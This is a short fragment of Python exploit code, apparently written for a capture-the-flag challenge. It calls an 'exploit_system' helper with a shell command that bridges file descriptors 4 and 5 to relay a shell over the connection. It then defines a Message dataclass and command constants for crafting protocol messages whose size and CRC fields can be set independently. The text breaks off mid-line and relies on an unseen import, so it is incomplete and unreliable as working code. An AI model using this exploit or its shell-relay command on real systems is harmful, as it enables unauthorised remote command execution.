from exploit2 import * exploit_system("cat <&4 >&5 & cat <&5 >&4; echo 'EOF!EOF!' >&5") from typing import Optional from zlib import crc32 from dataclasses import dataclass from functools import cache RESPONSE = 0x1336 ADD_MSG = 0x1337 ENCRYPT = 0x1338 DECRYPT = 0x1339 @dataclass class Message: mode: int = 0 size_mode0: Optional[int] = None id: int = 0 data: bytes = b"" crc: Optional[int] = None size_mode1: Optional[int] = None def to_bytes(self): if self.crc is None: self.crc = crc32(self.data) & 0xffffffff if self.size_mode0 is None: self.size_mode0 = len(self.data) if self.size_mode1 is None: self.size_mode1 = len(self.data) return struct.pack("